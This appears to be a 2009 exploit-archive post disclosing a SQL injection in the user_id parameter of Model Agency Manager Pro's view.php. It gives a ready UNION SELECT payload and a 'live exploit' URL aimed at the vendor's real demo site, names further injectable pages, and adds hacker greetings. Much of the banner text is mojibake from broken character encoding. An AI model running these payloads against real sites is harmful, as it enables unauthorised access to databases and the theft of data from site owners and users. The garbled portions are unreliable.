[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Model Agency Manager Pro (user_id) SQL Injection Vulnerability
# Published : 2009-09-09
# Author : R3d-D3v!L
# Previous Title : Joomla Component TPDugg 1.1 Blind SQL Injection Exploit
# Next Title : WX Guestbook 1.1.208 SQLi and persistent XSS


[a?¢] a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢{?¨?3ù… ?§ù?ù?ù? ?§ù??±?-ù…ù? ?§ù??±?-ù?ù…}a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢
[a??]
[~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
[a??]
[~] Vendor: www.phpmodelagencyscript.com
[a??]
[a??] Software: Model Agency Manager PRO
[a??]
[a??] author: ((??3d D3v!L))
[a??]
[a??] Date: 7.9.2009
[a??]
[a??] Home: CL0S3D
[a??]
[a??] contact: X@hotmail.co.jp
[a??]a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??{DEV!L'5 of SYST3M}a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??

[a??] Exploit:

[a??] XxX/view.php?user_id= EV!L !NJECT
[a??] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[a??] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[a??]MORE ER0RR:
photos.php?user_id=((??3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))

[a??]

N073:
REAL R3d-d3V!L !S h3R3 LAM3RZ ((a??Xa??))

ARAB!AAN HAAACCKER !!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & DEV!L R007 & 8orn 2 K!LL & D.MODY & G0G0 & arabian hacker & EL z0hery
[~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & ??????à1‘ ?1ù…?§?ˉ à1‘?????? & {0rashey}
[~]
[a??] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~]!'M 4r48!4N 3xPLO!T3R
[~]
[~]--------------------------------------------------------------------------------

# www.Syue.com [2009-09-09]